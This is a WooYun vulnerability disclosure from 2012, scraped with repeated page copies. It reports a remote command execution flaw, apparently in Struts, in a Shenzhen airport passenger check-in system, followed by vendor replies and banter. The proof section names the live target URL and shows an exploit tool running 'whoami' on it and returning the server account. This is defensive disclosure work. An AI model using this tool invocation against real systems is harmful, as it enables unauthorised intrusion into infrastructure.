深圳某机场值班系统漏洞（做过该飞机的注意了）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010951

漏洞标题：深圳某机场值班系统漏洞（做过该飞机的注意了）

漏洞作者： Metasploit

提交时间：2012-08-16 12:04

修复时间：2012-09-30 12:05

公开时间：2012-09-30 12:05

漏洞类型：命令执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-08-16：细节已通知厂商并且等待厂商处理中
2012-08-20：厂商已经确认，细节仅向厂商公开
2012-08-30：细节向核心白帽子及相关领域专家公开
2012-09-09：细节向普通白帽子公开
2012-09-19：细节向实习白帽子公开
2012-09-30：细节向公众公开

简要描述：

重要系统，远程命令执行漏洞

详细说明：

乘客信息查询系统存在命令执行本人目测漏洞善意提醒

漏洞证明：

http://zhiji.szairport.com/checkin/selectLanguage.action

$ ./xwork zhiji.szairport.com whoami
[+] Now try to exploit the zhiji.szairport.com
[+] Find 1 URLs
[-] Not found vulnerability :( , try to custom exploit .
[+] Input the url : http://zhiji.szairport.com/checkin/selectLanguage.action
[*] Now Exploit it !!
-----------------------------------
win2k3template\szxkaiya
-----------------------------------

修复方案：

升级struts

版权声明：转载请注明来源 Metasploit@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2012-08-20 22:59

厂商回复：

CNVD确认漏洞情况，由CNVD尝试直接联系网站管理方处置。视处置情况，看是否转由CNCERT广东分中心协调涉事单位处置。
按通用软件漏洞进行评分，rank 7

漏洞评价：

2012-08-16 12:48 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐，我猥琐故我强大)

深圳就宝安一个名用机场，深圳某机场，难道还能军用机场么
2012-08-16 12:53 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

“打”飞机？
2012-08-16 12:55 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

刚从那回来坑爹啊
2012-08-16 12:59 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐，我猥琐故我强大)

@xsser 坐过好几次，球坑爹
2012-08-16 13:47 | 树熊 ( 实习白帽子 | Rank:38 漏洞数:7 | 关注技术、关注安全)

....下个月要去坐....
2012-08-16 17:58 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

我就提交了个链接...那个图不是我提交的啊，我只是目测，然后猜测存在漏洞。
2012-08-16 18:18 | 风萧萧 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

@Metasploit 剑总给你补的，老大！
2012-08-16 18:34 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@Metasploit 草，我以为你忘了，坑爹啊
2012-08-16 20:56 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

嗯这样我就清白了！
2012-08-16 22:27 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

......
2012-08-17 11:11 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY：坏虾)

@xsser 剑哥中枪了。
2014-11-20 15:25 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

@xsser @Metasploit 太特码欢乐了，这个坟一定要挖

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010951

漏洞标题：深圳某机场值班系统漏洞（做过该飞机的注意了）

相关厂商：深圳宝安国际机场

漏洞作者： Metasploit

提交时间：2012-08-16 12:04

修复时间：2012-09-30 12:05

公开时间：2012-09-30 12:05

漏洞类型：命令执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Metasploit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010951

漏洞标题：深圳某机场值班系统漏洞（做过该飞机的注意了）

相关厂商：深圳宝安国际机场

漏洞作者： Metasploit

提交时间：2012-08-16 12:04

修复时间：2012-09-30 12:05

公开时间：2012-09-30 12:05

漏洞类型：命令执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-010951"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Metasploit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：